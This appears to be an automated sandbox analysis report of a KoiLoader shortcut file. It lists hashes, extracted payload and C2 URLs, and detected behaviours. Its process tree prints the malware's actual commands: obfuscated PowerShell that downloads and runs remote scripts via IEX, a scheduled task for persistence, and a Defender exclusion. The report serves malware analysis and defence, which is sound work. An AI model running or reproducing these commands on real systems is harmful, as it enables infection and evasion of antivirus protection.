Analysis
-
max time kernel
122s -
max time network
149s -
platform
windows10-2004_x64 -
resource
win10v2004-20250314-en -
resource tags
arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system -
submitted
09/04/2025, 06:42
Static task
static1
Behavioral task
behavioral1
Sample
chase_apr_2025.lnk
Resource
win10v2004-20250314-en
General
-
Target
chase_apr_2025.lnk
-
Size
1KB
-
MD5
36a9f6a6fe333f902077a73d990f0a4e
-
SHA1
906818153a8ff4bf10cfb8615ff6b9021140623c
-
SHA256
09ef17dc4284a8d1a8b937354bd8137aa9c0d98bffb897bd891ccff854484e43
-
SHA512
cfc907e28c5069edc9e837b53f13377fbc015e1baba7401d1f3adb0bbdefa1dc95b830da58ef3b84e07ef8e8558d0b9b593e3d5c4c0d258cb50f0c8c73d5f5c7
Malware Config
Extracted
https://rietiholidays.it/wp-content/uploads/2021/06
Extracted
koiloader
http://103.245.231.56/pentateuchal.php
-
payload_url
https://rietiholidays.it/wp-content/uploads/2021/06
Signatures
-
Koiloader family
-
Detects KoiLoader payload 1 IoCs
resource yara_rule behavioral1/memory/2276-56-0x0000000007D60000-0x0000000007D6D000-memory.dmp family_koi_loader -
Blocklisted process makes network request 6 IoCs
flow pid Process 9 4612 powershell.exe 63 2276 powershell.exe 67 2276 powershell.exe 69 5488 powershell.exe 70 5488 powershell.exe 82 2276 powershell.exe -
pid Process 4612 powershell.exe 2276 powershell.exe 632 powershell.exe 5488 powershell.exe -
Checks computer location settings 2 TTPs 3 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation cmd.exe Key value queried \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation wscript.EXE Key value queried \REGISTRY\USER\S-1-5-21-3975168204-1612096350-4002976354-1000\Control Panel\International\Geo\Nation wscript.exe -
Indicator Removal: Clear Persistence 1 TTPs 1 IoCs
Clear artifacts associated with previously established persistence like scheduletasks on a host.
pid Process 4212 powershell.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DllHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4712 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 13 IoCs
pid Process 4612 powershell.exe 4612 powershell.exe 4212 powershell.exe 4212 powershell.exe 4212 powershell.exe 2276 powershell.exe 2276 powershell.exe 632 powershell.exe 632 powershell.exe 632 powershell.exe 5488 powershell.exe 5488 powershell.exe 5488 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 4612 powershell.exe Token: SeDebugPrivilege 4212 powershell.exe Token: SeDebugPrivilege 2276 powershell.exe Token: SeDebugPrivilege 632 powershell.exe Token: SeDebugPrivilege 5488 powershell.exe -
Suspicious use of WriteProcessMemory 27 IoCs
description pid Process procid_target PID 5004 wrote to memory of 4612 5004 cmd.exe 87 PID 5004 wrote to memory of 4612 5004 cmd.exe 87 PID 4612 wrote to memory of 1568 4612 powershell.exe 91 PID 4612 wrote to memory of 1568 4612 powershell.exe 91 PID 4612 wrote to memory of 4712 4612 powershell.exe 92 PID 4612 wrote to memory of 4712 4612 powershell.exe 92 PID 720 wrote to memory of 4212 720 wscript.EXE 104 PID 720 wrote to memory of 4212 720 wscript.EXE 104 PID 4212 wrote to memory of 5480 4212 powershell.exe 106 PID 4212 wrote to memory of 5480 4212 powershell.exe 106 PID 4212 wrote to memory of 468 4212 powershell.exe 107 PID 4212 wrote to memory of 468 4212 powershell.exe 107 PID 468 wrote to memory of 2276 468 wscript.exe 108 PID 468 wrote to memory of 2276 468 wscript.exe 108 PID 468 wrote to memory of 2276 468 wscript.exe 108 PID 2768 wrote to memory of 1560 2768 DllHost.exe 114 PID 2768 wrote to memory of 1560 2768 DllHost.exe 114 PID 2768 wrote to memory of 1560 2768 DllHost.exe 114 PID 1560 wrote to memory of 632 1560 cmd.exe 116 PID 1560 wrote to memory of 632 1560 cmd.exe 116 PID 1560 wrote to memory of 632 1560 cmd.exe 116 PID 2276 wrote to memory of 4072 2276 powershell.exe 118 PID 2276 wrote to memory of 4072 2276 powershell.exe 118 PID 2276 wrote to memory of 4072 2276 powershell.exe 118 PID 4072 wrote to memory of 5488 4072 cmd.exe 120 PID 4072 wrote to memory of 5488 4072 cmd.exe 120 PID 4072 wrote to memory of 5488 4072 cmd.exe 120 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\chase_apr_2025.lnk1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:5004 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $affl = $env:programdata + '\' + ('2qr3mg7cssz4nr.js yxliyx19s'); $getf='D'+'ow'+'nl'+'oadF'+'ile'; $t670luhhb7i6w = New-Object Net.WebClient; $wscs = 'wscript '; $t670luhhb7i6w.$getf('https://rietiholidays.it/wp-content/uploads/2021/06/unprojectingsJX.php', '2qr3mg7cssz4nr.js'); . ('cu'+'rl.e'+'xe') -s -o zqd1lm17ezgl 'https://rietiholidays.it/wp-content/uploads/2021/06/covalencesxjiY.php'; mv zqd1lm17ezgl 'yxliyx19s.js'; . ('sc'+'hta'+'s'+'ks') /create /sc minute /mo 1 /f /tr ($wscs + $affl) /tn yxliyx19s;2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4612 -
C:\Windows\system32\curl.exe"C:\Windows\system32\curl.exe" -s -o zqd1lm17ezgl https://rietiholidays.it/wp-content/uploads/2021/06/covalencesxjiY.php3⤵PID:1568
-
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /sc minute /mo 1 /f /tr "wscript C:\ProgramData\2qr3mg7cssz4nr.js yxliyx19s" /tn yxliyx19s3⤵
- Scheduled Task/Job: Scheduled Task
PID:4712
-
-
-
C:\Windows\system32\wscript.EXEC:\Windows\system32\wscript.EXE C:\ProgramData\2qr3mg7cssz4nr.js yxliyx19s1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:720 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -com "schtasks /delete /tn yxliyx19s /f; wscript $env:programdata\yxliyx19s.js "2⤵
- Indicator Removal: Clear Persistence
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4212 -
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /delete /tn yxliyx19s /f3⤵PID:5480
-
-
C:\Windows\system32\wscript.exe"C:\Windows\system32\wscript.exe" C:\ProgramData\yxliyx19s.js3⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:468 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -command "$typs=[Ref].Assembly.GetTypes();$bss = 'https://rietiholidays.it/wp-content/uploads/2021/06'; Foreach($tt in $typs) {if ($tt.Name -like '*?siUt*s') {$c=$tt}}; $env:paths = '7zUCY2VKNMVQ'; IEX(Invoke-WebRequest -UseBasicParsing ($bss+'/argulusrQbt.php')); IEX(Invoke-WebRequest -UseBasicParsing ($bss+'/revettedYf.ps1'))"4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2276 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "powershell -command IEX(IWR -UseBasicParsing 'https://rietiholidays.it/wp-content/uploads/2021/06/sd2.ps1')"5⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4072 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command IEX(IWR -UseBasicParsing 'https://rietiholidays.it/wp-content/uploads/2021/06/sd2.ps1')6⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5488
-
-
-
-
-
-
C:\Windows\SysWOW64\DllHost.exeC:\Windows\SysWOW64\DllHost.exe /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2768 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c "powershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1560 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command Add-MpPreference -ExclusionPath 'C:\ProgramData'3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:632
-
-
-
C:\Windows\System32\wscript.exeC:\Windows\System32\wscript.exe "C:\ProgramData\rcb4cb3af-08e1-460e-bfae-f9dd6e47a0b1r.js"1⤵PID:4488
Network
MITRE ATT&CK Enterprise v16
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
202B
MD53407a07c85650e96c3e6ec56aa46ea1a
SHA1cad92877b5a293aac54432bd9981d68d80aab31a
SHA256d9719b4c842855ac5b7f8cbbe36b04aed226084e67d26d0c5f239d977f4a49a7
SHA51276379e47eaa4f254b36595d43d79c0034b02b68015f958ef66fb6c04a83acd7ff3b039c16cdcd7de6c95350a382f18fc29723ea84b7e5151f09a4872f7946e79
-
Filesize
1KB
MD569e9b5dfd8fc40979f299ddd2196f500
SHA136775432b67f8130bcee1443a74eba4a72889668
SHA2561d4961c0d9825bb0b771f5c7b788cf200e2db1e6a62a1481b125edca13d43650
SHA51243f7e7993e20a15fcc898853d1bd2ffbf459e868a4677faf3f724a75e19acc6d4782c224d143fb0551bc2c7445508e3de018cc6a98481062f33addf4fe6e21f8
-
Filesize
3KB
MD5556084f2c6d459c116a69d6fedcc4105
SHA1633e89b9a1e77942d822d14de6708430a3944dbc
SHA25688cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8
SHA5120f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e
-
Filesize
2KB
MD5968cb9309758126772781b83adb8a28f
SHA18da30e71accf186b2ba11da1797cf67f8f78b47c
SHA25692099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a
SHA5124bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3
-
Filesize
18KB
MD5bdeca768dc4217d0bfd563e11355b0c7
SHA131fcd28400e176ef0826334598313d664633f49d
SHA25604a8d11d2bac9c3dbfdd62c3dbf6f00eee0767a1228330fb5ef423ad43e8c7d0
SHA512b611d5814d1c48ebe6bc2ffd6fd7740243fa9dbf01c257723350ce78024a10e35cae281935291414628289b78e17fa7f3b523442b8f8fbb162cd4b17fe5c0a13
-
Filesize
64B
MD51a11402783a8686e08f8fa987dd07bca
SHA1580df3865059f4e2d8be10644590317336d146ce
SHA2569b1d1b468932a2d88548dc18504ac3066f8248079ecb083e919460bdb88398c0
SHA5125f7f9f76d9d12a25fdc5b8d193391fb42c37515c657250fe01a9bfd9fe4cc4eab9d5ec254b2596ac1b9005f12511905f19fdae41f057062261d75bd83254b510
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82